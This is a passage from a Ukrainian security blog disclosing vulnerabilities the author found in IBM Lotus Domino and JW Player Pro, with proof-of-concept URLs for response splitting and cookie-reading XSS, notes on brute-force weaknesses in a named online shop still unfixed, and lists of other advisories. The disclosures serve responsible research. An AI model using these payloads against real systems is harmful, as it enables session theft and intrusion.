Websecurity - Веб безпека

18.05.2012

У травні, 03.05.2012, під час пентесту, я виявив багато уразливостей в IBM Lotus Domino, зокрема HTTP Response Splitting та Cross-Site Scripting. Це четверта порція уразливостей в Lotus Domino. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливості в IBM Lotus Domino.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

28.08.2012

CVE: CVE-2012-3301

HTTP Response Splitting (WASC-25):

http://site/servlet/%0AHeader:value%0A1

Cross-Site Scripting (WASC-08):

Спрацює в різних браузерах (у випадку Mozilla Firefox спрацює для версій до Firefox 3.0.9):

http://site/servlet/%0ARefresh:0;URL=javascript:with(document)alert(cookie)%0A1

Спрацює в усіх версіях Firefox, але без доступу до кукісів:

http://site/servlet/%0ARefresh:0;URL=data:html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B%0A1

Також для XSS атаки може бути використаний заголовок Location.

Cross-Site Scripting (WASC-08):

Атака можлива через data: і vbscript: URI.

http://site/mail/x.nsf/MailFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
http://site/mail/x.nsf/WebInteriorMailFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Уразливі Lotus Domino 8.5.3 та попередні версії. Як деякий час тому мені повідомили з IBM, вони виправили дані уразливості в версії 8.5.4. Стосовно інших дірок в продуктах IBM, про які я повідомив їм, то вони ще працюють над їх виправленням. Також існує обхідний метод захисту від двох останніх XSS через спеціальні налаштування веб сервера (що IBM навела в своєму advisory).

15.05.2012

Ще в березні 2008, під час пентесту, я знайшов чимало уразливостей в IBM Lotus Domino. Деякі з них IBM вже виправила, деякі ні, а деякі виправила неякісно.

І у травні, 03.05.2012, під час нового пентесту, я виявив багато уразливостей в IBM Lotus Domino (деякі старі та багато нових), зокрема Cross-Site Scripting та Information Leakage. Це перша порція уразливостей в Lotus Domino. Про що найближчим часом повідомлю розробникам системи.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

27.08.2012

CVE: CVE-2012-3302

XSS (WASC-08):

Дана XSS в березні 2008 працювала наступним чином:

https://site/help/lccon.nsf/Main?OpenFrameSet&Frame=Topic&Src=javascript:alert(document.cookie);//

З тих пір вектор атаки через javascript: URI був виправлений, але існує можливість атаки через data: і vbscript: URI.

https://site/help/lccon.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://site/help/help85_client.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://site/help/help85_designer.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://site/help/help85_admin.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E

Information Leakage (WASC-13):

На сторінці https://site/domcfg.nsf, що доступна без аутентифікації, має місце витік інформації про конфігурацію веб сервера. Таку ситуацію я зустрічав на багатьох сайтах на Lotus Domino.

Уразливі Lotus Domino 8.5.3 та попередні версії. Як деякий час тому мені повідомили з IBM, вони виправили XSS уразливості в версії 8.5.4. Стосовно Information Leakage та інших дірок в продуктах IBM, про які я повідомив їм, то вони ще працюють над їх виправленням.

В даній добірці уразливості в веб додатках:

• HP LoadRunner Running on Windows, Remote Execution of Arbitrary Code (деталі)
• Blackboard Mobile Learn v3.0 - Persistent Web Vulnerability (деталі)
• AVAVoIP v1.5.12 - Multiple Web Vulnerabilities (деталі)
• ocPortal 7.1.5 <= | Open URL Redirection Vulnerability (деталі)
• DoS via Integer underflow in OpenSSL (деталі)
• Security Advisory in LedgerSMBv 1.3.20 and below: Denial of Service vulnerability (деталі)
• Social Engine 4 Persistent XSS & Non-Persistent XSS (деталі)
• Tekno.Portal v0.1b ‘link.php’ Blind SQL Injection Vulnerability (деталі)
• strongswan security update (деталі)
• Cross-Site Scripting (XSS) in Redaxo (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Chenpress, Cimy User Extra Fields та Site5 WordPress Theme. Для котрих з’явилися експлоіти. Chenpress - це новий rich-редактор для WP, Cimy User Extra Fields - це плагін для додання нових полей на сторінку реєстрації та в профіль користувача, Site5 WordPress Theme Email Spoofing - це експлоіт для різних тем Site5, що вразливі до автоматизованої розсилки спаму на довільні емайли.

• WordPress Chenpress Shell Upload (деталі)
• WordPress Cimy User Extra Fields 2.3.7 Shell Upload (деталі)
• Site5 WordPress Theme Email Spoofing (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• FlashPeak SlimBrowser TITLE Denial Of Service Vulnerability (деталі)
• Multiple Cross-Site Scripting (XSS) in Kajona (деталі)
• Jrobalian CMS SQL Injection Vulnerability (деталі)
• CakePHP 2.x-2.2.0-RC2 XXE Injection (деталі)
• WinRadius Server Denial Of Service Vulnerability (деталі)
• MGB OpenSource Guestbook 0.6.9.1 Multiple security vulnerabilities (деталі)
• Event Calendar PHP 1.2 - Multiple Web Vulnerabilites (деталі)
• VamCart v0.9 CMS - Multiple Web Vulnerabilities (деталі)
• Astaro Security Gateway v7.504 - Multiple Web Vulnerabilities (деталі)
• SMF Board v2.0.2 - Multiple Web Vulnerabilities (деталі)

У вересні, 12.08.2012 я виявив Content Spoofing та Cross-Site Scripting уразливості в JW Player Pro - ліцензійній версії JW Player. Які я виявив в одній комерційній CMS, в якій він використовується. Про що вже повідомив розробникам флеш додатку та розробнику CMS, де я виявив ці уразливості.

Раніше я вже писав про Content Spoofing та XSS уразливості в JW Player. В попередньому записі я згадував про дві уразливості, що стосувалися лише ліцензійної версії плеєра, а це дві нові уразливості в ній.

Content Spoofing:

http://site/player.swf?abouttext=Player&aboutlink=http://site

XSS:

http://site/player.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Вразливі JW Player Pro 5.10.2295 та попередні версії (ліцензійні версії JW Player). Розробник пообіцяв мені виправити дані уразливості найближчим часом - в оновленій версії 5.10 або в 5.11.

24.03.2012

У березні, 09.03.2012, я знайшов Brute Force, Insufficient Anti-automation та Abuse of Functionality уразливості на сайті http://palatka.net.ua (онлайн магазин). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на a1market.com.ua.

Детальна інформація про уразливості з’явиться пізніше.

22.08.2012

BF (в формі логіна для користувачів):

http://palatka.net.ua

BF (в формі логіна в адмінку):

http://palatka.net.ua/admin.php

IAA:

http://palatka.net.ua/vojjti.shtml

http://palatka.net.ua/ostavit-otzyv.shtml

На даних сторінках немає захисту від автоматизованих запитів (капчі).

Abuse of Functionality:

http://palatka.net.ua/vojjti.shtml

Через даний функціонал можна виявляти логіни.

Дані уразливості досі не виправлені.

В даній добірці уразливості в веб додатках:

• HP SNMP Agents for Linux, Remote Cross Site Scripting (XSS), URL Redirection (деталі)
• Phonalisa v5.0 VoiP - Multiple Web Vulnerabilities (деталі)
• Puppet vulnerabilities (деталі)
• Multiple CSRF Vulnerabilities in GLPI Version 0.83.2 (деталі)
• Cross site scripting vulnerability found in GLPI 0.83.2 (деталі)
• HP System Health Application and Command Line Utilities for Linux, Remote Execution of Arbitrary Code (деталі)
• mono security update (деталі)
• extplorer security update (деталі)
• PHP Jobsite v1.36 - Cross Site Scripting Vulnerabilities (деталі)
• Reserve Logic v1.2 Booking CMS - Multiple Vulnerabilities (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах WP-Predict, Generic Plugin та Resume Submissions / Job Postings. Для котрих з’явилися експлоіти. WP-Predict - це плагін для створення опитувань, Generic Plugin Shell Upload - це експлоіт для різних вразливих плагінів WP, що дозволяють завантажувати php-файли (зокрема плагіни з uploadify), Resume Submissions / Job Postings - це плагін для розміщення резюме та вакансій.

• WordPress WP-Predict 1.0 Blind SQL Injection (деталі)
• WordPress Generic Plugin Shell Upload (деталі)
• WordPress Resume Submissions / Job Postings 2.5.1 Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• HP Performance Insight for Networks Running on HP-UX, Linux, Solaris, and Windows, Remote SQL Injection, Cross Site Scripting (XSS), Privilege Elevation (деталі)
• Arasism Remote Command Upload Vulnerability (деталі)
• Gharine Cross Site Scripting Vulnerabilitiy (деталі)
• Flogr V1.7 Xss Vulnerability (деталі)
• HP Insight Management Agents for Windows Server, Remote Cross Site Request Forgery (CSRF), Cross Site Scripting (XSS), URL Redirection, Unauthorized Modification, Denial of Service (деталі)
• Behsamanco CMS Editor Vulnerability (деталі)
• BookNux 0.2 <= Multiple Vulnerabilities (деталі)
• Apache Sling denial of service vulnerability (деталі)
• Astaro Command Center v2.x - Multiple Web Vulnerabilities (деталі)
• Apache Hadoop HDFS information disclosure vulnerability (деталі)